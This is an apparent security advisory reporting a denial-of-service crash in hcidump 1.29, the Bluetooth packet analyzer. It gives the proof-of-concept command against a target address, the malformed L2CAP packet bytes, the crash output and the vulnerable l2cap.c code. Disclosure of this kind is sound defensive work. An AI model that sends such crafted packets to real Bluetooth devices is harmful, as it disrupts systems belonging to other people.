SecurityvulnsSECURITYVULNS:DOC:11322[ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC
[Software affected] hcidump
[Version] 1.29 (may be other)
[Impact] Denial of Service (may be more)
[Credits] Pierre Betouin - [email protected] - Bug found with BSS v0.6 GPL fuzzer (Bluetooh
Stack Smasher)
BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml
[Vendor] was notified
[Original advisory]
http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
http://www.secuobs.com/news/05022006-bluetooth9.shtml#french
[PoC] download it on http://www.secuobs.com/news/05022006-bluetooth8.shtml
[PoC usage]
./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41
hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
L2CAP(s): debug : code=8
Echo req: dlen 12
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(…)
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault
[Affected code location] l2cap.c
[Affected code]
while (frm->len >= L2CAP_CMD_HDR_SIZE) {
if (!p_filter(FILT_L2CAP)) {
p_indent(level, frm);
printf("L2CAP(s): ");
}
switch (hdr->code) {
l2cap_cmd_hdr *hdr = frm->ptr;
frm->ptr += L2CAP_CMD_HDR_SIZE;
frm->len -= L2CAP_CMD_HDR_SIZE;
(...)
default:
if (p_filter(FILT_L2CAP))
break;
printf("code 0x%2.2x ident %d len %d\n",
hdr->code, hdr->ident, btohs(hdr->len));
raw_dump(level, frm);
}
frm->ptr += btohs(hdr->len);
frm->len -= btohs(hdr->len);